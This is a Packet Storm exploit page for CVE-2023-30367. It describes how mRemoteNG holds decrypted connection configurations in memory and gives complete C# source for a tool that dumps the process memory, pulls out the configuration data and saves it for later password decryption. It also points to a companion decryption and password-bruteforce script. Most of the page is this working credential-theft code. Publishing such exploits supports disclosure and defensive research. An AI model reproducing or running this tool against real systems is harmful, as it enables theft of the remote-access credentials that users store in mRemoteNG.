what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction
Posted Jul 31, 2023
Authored by Maximilian Barz

mRemoteNG version 1.77.3.1784-NB exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

tags | exploit, info disclosure
advisories | CVE-2023-30367
SHA-256 | 317d7c61096327e5b26547dc45e1871ea228f9b129d6c588a6ad96a624ad6231

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

Change Mirror Download
# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage: https://mremoteng.org/
# Software Link: https://mremoteng.org/download
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367




/*
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to
store and manage multi-protocol connection configurations to remotely connect to systems.

mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev
loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,
even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text
through a memory dump and thus compromise user credentials when no custom password encryption key has been set.
This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
*/


using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;


namespace mRemoteNGDumper
{
public static class Program
{

public enum MINIDUMP_TYPE
{
MiniDumpWithFullMemory = 0x00000002
}

[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_EXCEPTION_INFORMATION
{
public uint ThreadId;
public IntPtr ExceptionPointers;
public int ClientPointers;
}

[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);


static void Main(string[] args)
{
string input;
bool configfound = false;
StringBuilder filesb;
StringBuilder linesb;
List<string> configs = new List<string>();

Process[] localByName = Process.GetProcessesByName("mRemoteNG");

if (localByName.Length == 0) {
Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
System.Environment.Exit(1);
}
string assemblyPath = Assembly.GetEntryAssembly().Location;
Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
FileStream procdumpFileStream = File.Create(dumpFileName);
MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();

// A full memory dump is necessary in the case of a managed application, other wise no information
// regarding the managed code will be available
MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
procdumpFileStream.Close();

filesb = new StringBuilder();
Console.WriteLine("[+] Searching for configuration files in memory dump.");
using (StreamReader reader = new StreamReader(dumpFileName))
{
while (reader.Peek() >= 0)
{
input = reader.ReadLine();
string pattern = @"(\<Node)(.*)(?=\/>)\/>";
Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
if (m.Success)
{
configfound = true;

foreach (string config in m.Value.Split('>'))
{
configs.Add(config);
}
}

}

reader.Close();
if (configfound)
{
string currentDir = System.IO.Directory.GetCurrentDirectory();
string dumpdir = currentDir + "/dump";
if (!Directory.Exists(dumpdir))
{
Directory.CreateDirectory(dumpdir);
}

string savefilepath;
for (int i =0; i < configs.Count;i++)
{
if (!string.IsNullOrEmpty(configs[i]))
{
savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
using (StreamWriter writer = new StreamWriter(savefilepath))
{
writer.Write(configs[i]+'>');
writer.Close();
}
}
}
Console.WriteLine("[+] Done!");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );
}
else
{
Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
}
}
}
}
}

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close